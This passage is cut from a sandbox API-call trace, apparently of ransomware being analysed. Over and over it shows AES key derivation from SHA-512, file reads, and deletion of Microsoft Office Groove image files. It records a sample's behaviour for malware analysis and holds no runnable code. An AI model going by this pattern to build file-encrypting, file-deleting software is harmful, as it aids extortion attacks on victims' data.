lpOverlapped=0x0) returned 1 [0164.053] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0164.053] CryptDestroyKey (hKey=0x284d668) returned 1 [0164.053] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0164.054] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_FileOffMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\alertimage_fileoffmask.bmp")) returned 1 [0164.056] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0164.056] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0164.056] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0164.056] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0164.056] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13ca [0164.056] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0164.114] CryptDestroyHash (hHash=0x284d628) returned 1 [0164.114] CryptDestroyKey (hKey=0x284d668) returned 1 [0164.114] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0164.115] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_High.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\alertimage_high.jpg")) returned 1 [0164.116] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0164.117] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0164.117] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0164.117] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0164.117] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1c6e [0164.117] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0164.133] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0164.133] CryptDestroyKey (hKey=0x284d668) returned 1 [0164.133] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0164.134] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_HighMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\alertimage_highmask.bmp")) returned 1 [0164.136] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0164.136] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0164.137] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0164.137] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0164.137] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x41de [0164.137] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0164.165] CryptDestroyHash (hHash=0x284d628) returned 1 [0164.165] CryptDestroyKey (hKey=0x284d668) returned 1 [0164.165] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0164.166] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_Medium.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\alertimage_medium.jpg")) returned 1 [0164.167] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0164.168] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0164.168] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0164.168] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0164.168] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1c6e [0164.168] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0164.186] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0164.186] CryptDestroyKey (hKey=0x284d668) returned 1 [0164.186] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0164.187] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_MediumMAsk.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\alertimage_mediummask.bmp")) returned 1 [0164.210] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0164.211] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0164.211] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0164.211] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0164.211] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3e78 [0164.211] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0164.231] CryptDestroyHash (hHash=0x284d628) returned 1 [0164.232] CryptDestroyKey (hKey=0x284d668) returned 1 [0164.232] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0164.233] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_Off.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\alertimage_off.jpg")) returned 1 [0164.235] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0164.235] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0164.235] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0164.235] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0164.235] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1c6e [0164.235] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0164.253] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0164.253] CryptDestroyKey (hKey=0x284d668) returned 1 [0164.253] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0164.255] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_OffMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\alertimage_offmask.bmp")) returned 1 [0164.256] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0164.257] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0164.257] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0164.257] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0164.257] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2256 [0164.257] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0164.263] CryptDestroyHash (hHash=0x284d628) returned 1 [0164.263] CryptDestroyKey (hKey=0x284d668) returned 1 [0164.263] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0164.264] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\CommsIncomingImage.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\commsincomingimage.jpg")) returned 1 [0164.265] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0164.266] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0164.266] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0164.266] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0164.266] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x9d8 [0164.266] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0164.284] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0164.284] CryptDestroyKey (hKey=0x284d668) returned 1 [0164.284] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0164.286] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\CommsIncomingImageMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\commsincomingimagemask.bmp")) returned 1 [0164.287] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0164.287] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0164.287] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0164.287] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0164.288] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x630 [0164.288] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0164.317] CryptDestroyHash (hHash=0x284d628) returned 1 [0164.317] CryptDestroyKey (hKey=0x284d668) returned 1 [0164.317] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0164.318] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\CommsIncomingImageMaskSmall.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\commsincomingimagemasksmall.bmp")) returned 1 [0164.320] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0164.320] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0164.320] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0164.320] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0164.320] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1de3 [0164.320] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0164.343] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0164.343] CryptDestroyKey (hKey=0x284d668) returned 1 [0164.343] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0164.344] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\CommsIncomingImageSmall.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\commsincomingimagesmall.jpg")) returned 1 [0164.346] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0164.346] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0164.346] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0164.346] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0164.346] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x22c0 [0164.346] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0164.376] CryptDestroyHash (hHash=0x284d628) returned 1 [0164.376] CryptDestroyKey (hKey=0x284d668) returned 1 [0164.376] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0164.377] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\CommsOutgoingImage.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\commsoutgoingimage.jpg")) returned 1 [0164.379] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0164.380] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0164.380] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0164.380] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0164.380] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x9d8 [0164.380] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0164.385] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0164.385] CryptDestroyKey (hKey=0x284d668) returned 1 [0164.385] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0164.387] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\CommsOutgoingImageMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\commsoutgoingimagemask.bmp")) returned 1 [0164.388] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0164.389] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0164.389] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0164.389] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0164.389] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x630 [0164.389] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0164.406] CryptDestroyHash (hHash=0x284d628) returned 1 [0164.406] CryptDestroyKey (hKey=0x284d668) returned 1 [0164.406] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0164.407] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\CommsOutgoingImageMaskSmall.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\commsoutgoingimagemasksmall.bmp")) returned 1 [0164.408] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0164.409] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0164.409] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0164.409] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0164.409] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1dd7 [0164.409] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0164.451] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0164.451] CryptDestroyKey (hKey=0x284d668) returned 1 [0164.451] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0164.453] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\CommsOutgoingImageSmall.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\commsoutgoingimagesmall.jpg")) returned 1 [0164.454] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0164.455] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0164.455] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0164.455] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0164.455] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2798 [0164.455] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0164.501] CryptDestroyHash (hHash=0x284d628) returned 1 [0164.501] CryptDestroyKey (hKey=0x284d668) returned 1 [0164.501] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0164.502] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\MessageBoxIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\messageboxiconimages.jpg")) returned 1 [0164.504] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0164.505] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0164.505] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0164.505] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0164.505] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc0 [0164.505] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0164.506] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0164.506] CryptDestroyKey (hKey=0x284d668) returned 1 [0164.506] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0164.507] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\MessageBoxIconImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\messageboxiconimagesmask.bmp")) returned 1 [0164.509] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0164.510] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0164.510] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0164.510] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0164.510] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1fec [0164.510] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0164.538] CryptDestroyHash (hHash=0x284d628) returned 1 [0164.538] CryptDestroyKey (hKey=0x284d668) returned 1 [0164.539] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0164.540] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\UnreadIcon.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\unreadicon.jpg")) returned 1 [0164.542] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0164.542] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0164.542] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0164.542] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0164.542] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1ffe [0164.542] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0164.612] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0164.612] CryptDestroyKey (hKey=0x284d668) returned 1 [0164.612] CryptReleaseContext 